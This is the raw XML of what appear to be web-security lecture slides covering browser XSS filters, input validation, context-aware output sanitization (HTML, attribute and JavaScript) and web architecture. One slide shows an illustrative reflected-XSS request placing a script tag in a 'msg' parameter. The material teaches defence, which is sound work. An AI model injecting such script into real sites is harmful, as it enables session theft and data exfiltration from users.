              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Other private data may still be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>exfiltrated</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> from the origin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27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Client-side XSS Filters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25158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HTTP/1.1 200 OK</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… other HTTP headers…</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>X-XSS-Protection: 1; mode=block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POST /blah HTTP/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>… other HTTP headers…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to=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dude&amp;msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>=&lt;script&gt;...&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6556309" y="1485415"/>
            <a:ext cx="5281127" cy="4704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800" dirty="0"/>
              <a:t>Browser mechanism to filter "script-like" data sent as part of requests</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1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i.e., check whether a request parameter contains data that looks like a reflected XSS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800" dirty="0"/>
              <a:t>Enabled in most browsers</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1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Heuristic defense against reflected XSS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800" dirty="0"/>
              <a:t>Would this work against other XSS types?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838200" y="3576734"/>
            <a:ext cx="5131837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21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The Web has become a powerful platform for developing and distributing applications</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Huge user population</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Relatively easy to develop and deploy cross-platform</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Platform has evolved significantly</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Very simple model initially</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Today, it is a mix of client- and server-side components</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web services and APIs are now ubiquitous</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Geared towards an open model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>On the client-side, all documents, data, and code are visible/modifiable</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Commonplace to link to or share data/code with other (untrusted) sites</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="186804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 Integrity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Another defensive approach is to ensure that untrusted content can't modify document structure in unintended ways</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Think of this as sandboxing user-controlled data that is interpolated into documents</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Must be implemented server-side</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You as a web developer have no guarantees about what happens client-side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Two main classes of approaches</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Input validation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Output sanitization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34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Validation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x = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>request.args.get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'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>msg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'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</a:rPr>
              <a:t>if not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is_valid_base64(x): abort(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>500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Goal is to check that application inputs are "valid"</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Request parameters, header data, posted data, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Assumption is that well-formed data should also not contain attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Also relatively easy to identify all inputs to validate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>However, it's difficult to ensure that valid == safe</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Much can happen between input validation checks and document interpolation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91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Sanitization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</a:rPr>
              <a:t>&lt;div </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
              </a:rPr>
              <a:t>id=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>"content"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>{{sanitize(data)}}</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;/div&gt;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Another approach is to sanitize untrusted data during interpolation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remove or encode special characters like ‘&lt;‘ and ‘&gt;’, etc.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Easier to achieve a strong guarantee that script can't be injected into a document</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But it can be difficult to specify the sanitization policy (coverage, exceptions)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Must take interpolation context into account</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>CDATA, attributes, JavaScript, CSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Nesting!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Requires a robust browser model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50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4500" dirty="0"/>
              <a:t>Challenges of Sanitizing Data</a:t>
            </a:r>
            <a:endParaRPr sz="4500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="457" name="Shape 4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400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;div</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>id=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>"content"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill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400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;h1&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>User Info</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;/h1&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill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400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;p&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>Hi {{user.name}}</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;/p&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill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400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;p</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>id=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>"status"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="A09F25"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>style=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>"{{</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>user.style</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>}}"</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&gt;&lt;/p&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill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400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;/div&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill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endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill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400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3E3E3E"/>
              </a:solidFill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400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>    $.get(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'/user/status/{{user.id}}'</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>function</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>(data) {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400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>        $(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'#status'</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>).html(</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="D7391E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>'You are now '</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7F7F7F"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>data.status</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>);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400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>    });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400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="35A327"/>
                </a:solidFill>
                <a:ea typeface="Menlo"/>
                <a:cs typeface="Menlo"/>
                <a:sym typeface="Menlo"/>
              </a:rPr>
              <a:t>&lt;/script&gt;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4242392" y="1559866"/>
            <a:ext cx="2477386" cy="531517"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -68472"/>
              <a:gd name="adj2" fmla="val 1205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HTML Sanitization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Rectangular Callout 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6925340" y="2091383"/>
            <a:ext cx="2558901" cy="531517"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -108361"/>
              <a:gd name="adj2" fmla="val 785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Attribute Sanitization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Rectangular Callout 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6014483" y="3467719"/>
            <a:ext cx="2558901" cy="531517"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -108361"/>
              <a:gd name="adj2" fmla="val 785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JavaScript Sanitization</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangular Callout 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6301562" y="5271337"/>
            <a:ext cx="2594344" cy="739986"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val -42787"/>
              <a:gd name="adj2" fmla="val -939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Was this sanitized by the server?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="304252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6" grpId="0" animBg="1"/>
      <p:bldP spid="1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905BA41-EE6E-4F80-8636-447F22DD7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A51B27B-363E-43D6-91B7-74B4AAD11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8465" y="3298722"/>
            <a:ext cx="8495070" cy="17844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Structured Query Language (SQL)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F75A0E-0667-406E-AD6D-4E6555A475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48465" y="5258851"/>
            <a:ext cx="8495070" cy="90400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CREATE, INSERT, UPDATE</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/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SELECT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D7549B2-EE05-4558-8C64-AC46755F2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25914" y="889251"/>
            <a:ext cx="2140172" cy="214017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phic 8" descr="Database">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{06D87D1C-3E36-4FDD-8229-83F92F03D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8264" y="1371601"/>
            <a:ext cx="1175474" cy="117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07575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Architecture circa-2020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714" y="2275968"/>
            <a:ext cx="893446" cy="8934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62895" y="1508714"/>
            <a:ext cx="5955341" cy="4608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Server Side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62024" y="1507922"/>
            <a:ext cx="2390775" cy="46166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Protocols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62024" y="3399699"/>
            <a:ext cx="23907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FTP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>HTTP 1.0/1.1</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>HTTP 2.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>SSL and TLS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Websocket</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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453" y="5116502"/>
            <a:ext cx="1043939" cy="104393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 rot="5400000">
            <a:off x="3530439" y="4322953"/>
            <a:ext cx="2264913" cy="3821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Network Protocols</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="66" name="Rectangle 65"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5319024" y="3620770"/>
            <a:ext cx="2445499" cy="10846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Application Code</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(Java, PHP, Python, Node, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="67" name="Flowchart: Magnetic Disk 66"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8171741" y="2604732"/>
            <a:ext cx="1084225" cy="94572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Database</a:t>
            </a:r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4853954" y="4163119"/>
            <a:ext cx="465070" cy="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/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4853954" y="5552011"/>
            <a:ext cx="3437850" cy="304653"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3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/>
          <p:cNvCxnSpPr>
            <a:stCxn id="66" idx="3"/>
            <a:endCxn id="12" idx="0"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7764523" y="4163119"/>
            <a:ext cx="942900" cy="953383"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector2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Elbow Connector 77"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="66" idx="3"/>
            <a:endCxn id="67" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="7764523" y="3550456"/>
